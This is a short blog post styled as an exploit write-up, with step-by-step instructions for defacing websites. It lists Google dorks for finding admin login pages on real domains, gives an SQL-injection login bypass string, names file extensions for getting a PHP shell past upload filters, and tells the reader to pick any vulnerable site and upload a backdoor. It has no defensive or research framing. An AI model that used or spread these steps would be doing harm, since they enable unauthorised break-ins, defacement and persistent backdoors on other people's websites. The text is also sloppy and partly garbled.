Deface with Bypass Admin
# Exploit Title: Deface with Bypass Admin
# Tested on: Windows 8 Ultimate 32bit
# Google Dork: inurl:/admin.php intext:login intext:adminsitrator site:il
inurl:/admin/index.php intext:username site:com
inurl :/admin/Admin.php intext:login site:.id
(select one of the three dork)
# Shell Extension: .php.pjpeg, .phtml, .php.xxxjpeg, etc.
# List Bypass Admin : pastebin
+-----------------------------------------------------------------------+
1. Dorking to Google. For example I use dork:
inurl :/admin/Admin.php intext:login
2. Choose one website
3. Fill in the username + password:
'=''or'
4. If vuln, it will enter the web Control Panel / Admin Panel
If the login fails, look for another web
5. And if you successfully login,upload your file or upload yout shell
backdoor :). Erorr? upload mini Shel!
No comments:
Post a Comment